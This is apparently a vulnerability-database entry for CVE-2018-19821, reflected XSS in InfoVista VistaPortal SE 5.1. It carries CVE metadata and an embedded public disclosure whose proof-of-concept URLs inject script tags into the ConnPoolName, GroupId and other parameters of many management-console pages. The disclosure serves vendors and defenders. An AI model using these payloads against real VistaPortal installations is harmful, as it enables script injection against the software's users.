Description
Cross Site Scripting exists in InfoVista VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via the ConnPoolName parameter.
Affected Software
Related
{"id": "CVE-2018-19821", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2018-19821", "description": "Cross Site Scripting exists in InfoVista VistaPortal SE Version 5.1 (build 51029). The page \"/VPortal/mgtconsole/SecurityPolicies.jsp\" has reflected XSS via the ConnPoolName parameter.", "published": "2018-12-17T15:29:00", "modified": "2019-01-03T12:50:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19821", "reporter": "cve@mitre.org", "references": ["http://seclists.org/fulldisclosure/2018/Dec/20", "http://packetstormsecurity.com/files/150690/VistaPortal-SE-5.1-Cross-Site-Scripting.html"], "cvelist": ["CVE-2018-19821"], "immutableFields": [], "lastseen": "2023-02-09T14:20:03", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:150690"]}], "rev": 4}, "score": {"value": 3.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:150690"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "infovista vistaportal", "version": 5}]}, "epss": [{"cve": "CVE-2018-19821", "epss": "0.007380000", "percentile": "0.778940000", "modified": "2023-03-14"}], "vulnersScore": 3.5}, "_state": {"dependencies": 1675957601, "score": 1675954691, "affected_software_major_version": 1677276084, "epss": 1678874978}, "_internal": {"score_hash": "a3856d4bf4e8697994efabc2467cbba4"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:infovista:vistaportal:5.1"], "cpe23": ["cpe:2.3:a:infovista:vistaportal:5.1:*:*:*:standard:*:*:*"], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "infovista:vistaportal", "version": "5.1", "operator": "eq", "name": "infovista vistaportal"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:infovista:vistaportal:5.1:*:*:*:standard:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "http://seclists.org/fulldisclosure/2018/Dec/20", "name": "20181207 [CVE-2018-19649, CVE-2018-19765 to CVE-2018-19775, CVE-2018-19809 to CVE-2018-19822] - Multiple Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029)", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/150690/VistaPortal-SE-5.1-Cross-Site-Scripting.html", "name": "http://packetstormsecurity.com/files/150690/VistaPortal-SE-5.1-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}], "product_info": [{"vendor": "Infovista", "product": "Vistaportal"}]}
{"packetstorm": [{"lastseen": "2018-12-08T02:36:14", "description": "", "cvss3": {}, "published": "2018-12-07T00:00:00", "type": "packetstorm", "title": "VistaPortal SE 5.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-19766", "CVE-2018-19771", "CVE-2018-19813", "CVE-2018-19811", "CVE-2018-19768", "CVE-2018-19812", "CVE-2018-19773", "CVE-2018-19774", "CVE-2018-19820", "CVE-2018-19815", "CVE-2018-19821", "CVE-2018-19814", "CVE-2018-19817", "CVE-2018-19809", "CVE-2018-19775", "CVE-2018-19819", "CVE-2018-19810", "CVE-2018-19818", "CVE-2018-19816", "CVE-2018-19772", "CVE-2018-19767", "CVE-2018-19822", "CVE-2018-19765", "CVE-2018-19769", "CVE-2018-19649", "CVE-2018-19770"], "modified": "2018-12-07T00:00:00", "id": "PACKETSTORM:150690", "href": "https://packetstormsecurity.com/files/150690/VistaPortal-SE-5.1-Cross-Site-Scripting.html", "sourceData": "`Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766, \nCVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770, \nCVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774, \nCVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811, \nCVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815, \nCVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819, \nCVE-2018-19820, CVE-2018-19821, CVE-2018-19822 \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19649 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"RolePermissions.jsp\" has reflected XSS via ConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19765 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"EditCurrentPresentSpace.jsp\" has reflected XSS via ConnPoolName, \nGroupId and ParentId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0 \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0 \n \nVulnerable parameter: ConnPoolName, GroupId and ParentId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19766 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"GroupRessourceAdmin.jsp\" has reflected XSS via ConnPoolName \nparameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=Configuration,Security \nResources&loginPath=_VP_Configuration,_VP_Security_Resources \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19767 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"PresentSpace.jsp\" has reflected XSS via ConnPoolName and GroupId \nparameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=Page \nPackages,InfoVista \nSolutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package \nhttp://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page \nPackages,InfoVista \nSolutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package \n \nVulnerable parameters: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19768 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"SubPagePackages.jsp\" has reflected XSS via ConnPoolName and \nGroupId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=Page \nPackages&loginPath=PagePackageMainFolder \nhttp://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page \nPackages&loginPath=PagePackageMainFolder \n \nVulnerable parameters: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19769 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"UserProperties.jsp\" has reflected XSS via ConnPoolName. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=Configuration,User \nProperties&loginPath=_VP_Configuration,_VP_User_Propertie \n \nVulnerable parameters: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19770 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"Users.jsp\" has reflected XSS via ConnPoolName. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=All,InfoVista \nSolutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups \n \nVulnerable parameters: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19771 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"EditCurrentPool.jsp\" has reflected XSS via PropName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r) \nDatabase \nConnection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection \n \nVulnerable parameter: PropName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19772 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"EditCurrentPresentSpace.jsp\" has reflected XSS via ConnPoolName, \nGroupId and ParentId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0 \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0 \n \nVulnerable parameter: ConnPoolName, GroupId and ParentId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19773 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"EditCurrentUser.jsp\" has reflected XSS via GroupId and \nConnPoolName parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&accessPath=All,Super \nAdministrator&loginPath=All,_superadmin_shadow_ \nhttp://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super \nAdministrator&loginPath=All,_superadmin_shadow_ \n \nVulnerable parameter: GroupId and ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19774 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"PresentSpace.jsp\" has reflected XSS via GroupId and ConnPoolName \nparameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&type=U \nhttp://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&ConnPoolName=default&type=U \n \nVulnerable parameter: GroupId and ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19775 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"Variables.jsp\" has reflected XSS via ConnPoolName and GroupId \nparameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&CurrentFolder=AdHo \nhttp://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo \n \nVulnerable parameter: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19809 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/GroupCopy.jsp\" has reflected XSS via \nConnPoolName, GroupId and type parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt> \nhttp://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ConnPoolName=default \nhttp://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&GroupUserId=159&ConnPoolName=default \n \nVulnerable parameter: ConnPoolName, GroupId and type \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19810 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/GroupMove.jsp\" has reflected XSS via \nConnPoolName, GroupId and type parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt> \nhttp://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&GroupUserId=159&ConnPoolName=default \n \nVulnerable parameter: ConnPoolName and type \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19811 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Import.jsp\" has reflected XSS via \nConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ImportAs=159 \n \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19812 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/SubFolderPackages.jsp\" has reflected XSS via \nGroupId parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ConnPoolName=default&type=F \n \nVulnerable parameter: GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19813 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Subscribers.jsp\" has reflected XSS via \nConnPoolName and GroupId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=P \nhttp://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ConnPoolName=default&type=P \n \nVulnerable parameter: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19814 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Subscriptions.jsp\" has reflected XSS via \nConnPoolName and GroupId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P \n'\"><ScRiPt>alert(\"xss\")</ScRiPt> \nhttp://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=P \nhttp://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ConnPoolName=default&type=P \n \nVulnerable parameter: ConnPoolName, GroupId and type \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19815 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/UserPopupAddNewProp.jsp\" has reflected XSS \nvia ConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt> \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19816 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/categorytree/ChooseCategory.jsp\" has \nreflected XSS via ConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt> \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n 